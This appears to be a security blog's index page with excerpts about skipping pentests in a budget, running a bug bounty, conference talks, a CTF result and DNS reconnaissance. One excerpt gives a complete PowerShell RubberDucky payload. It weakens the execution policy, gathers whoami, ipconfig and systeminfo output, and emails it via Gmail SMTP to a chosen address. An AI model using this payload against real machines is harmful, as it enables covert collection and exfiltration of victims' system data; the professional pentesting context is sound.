Pentesting

BLUF Competing priorities, cost-consciousness, and lower-hanging security fruit were the reasons penetration didn’t make it into my AOP this year. I’m not in a highly regulated environment, though, so if regular penetration testing is a requirement, then your options are limited, but here are some things to consider. Analysis Each offensive security consultancy and penetration tester has their own methodlogy. Penetration testing isn’t guaranteed to find your most prevalent vulnerability, nor your most difficult, movie-plot security threat. It should, more often than not, find your lowest hanging fruit. Nothing in life is guaranteed so you may find you spent five figures to learn that those critical vulnerabilities your vuln scanner has complained about for weeks are, in fact, critical vulnerabilities that attackers will abuse to gain access to your data. ...

How my career is changing.

I share my experience and lessons learned from operating a public bug bounty.

I’m managing a bug bounty program that has shown tremendous benefit so far. Several findings have been extremely clever, and I’ve been fortunate enough to have good interactions with the vulnerability researchers. However, I’ve also had a few unsatisfactory interactions with researchers. This post is directed at Bug Bounty researchers that do not have much experience in corporate environments. I think a list of do’s and don’ts is appropriate for this breakdown. ...

On a recent engagement I supported the lead by developing a PowerShell payload for a RubberDucky. The gist is that it will run a handful of standard Windows commands and then e-mail the results to a specified address. It proved to be very helpful and I’ve included it below with comments: # Set execution policy to allow unrestricted script scope Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false #Create results file in current user's temp directory $results = $env:temp + '\results.txt' #Run whoami $who = 'whoami.exe' $rwho = & $who #Run ipconfig /all $ipc = 'ipconfig.exe' $ipcs = '/all' $ripc = & $ipc $ipcs #Run systeminfo $sysi = 'systeminfo.exe' $rsysi = & $sysi #Wait for systeminfo to finish Start-Sleep -s 5 #Write results $output = $rwho + $ripc + $rsysi | Out-File $results #Send results to e-mail address $hostname = $env:computername $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SMTPServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredentials('<yourusername>', '<yourpassword>') $ResultMail = New-Object System.Net.Mail.MailMessage $ResultMail.From = '<fromaddress>' $ResultMail.To.Add('<destinationmail>') $ResultMail.Subject = "Mail Subject" $ResultMail.Body = "Mail Body" $ResultMail.Attachments.Add($results) $SMTPInfo.Send($ResultMail) #Optional pop-up confirmation box #Note: This WILL raise user suspicion $wshell = New-Object -ComObject Wscript.Shell $wshell.Popup("Operation Complete.", 0, "OK", 0x1) Merry Christmas and Happy Holidays! ...

Unfortunately, I didn’t arrive at the ballroom early enough to get seats, or even standing room, to see this talk in-person: Ed Skoudis: How To Give The Best Pen Test Of Your Life If you’re a Pen Tester, this talk is a must-see. Once you’ve finished that talk, check out John Strand’s excellent follow-up talk! After competing for Friday night, most of Saturday, and Sunday morning, I emerged as the 30th position (solo) out of the 120 teams competing in the CTF. Not bad, but I want to do better! ...

NBNS still works!

Learn how to create a metasploit module

Introductory methods for DNS reconnaissance.

Techniques for performing subdomain enumeration information gathering.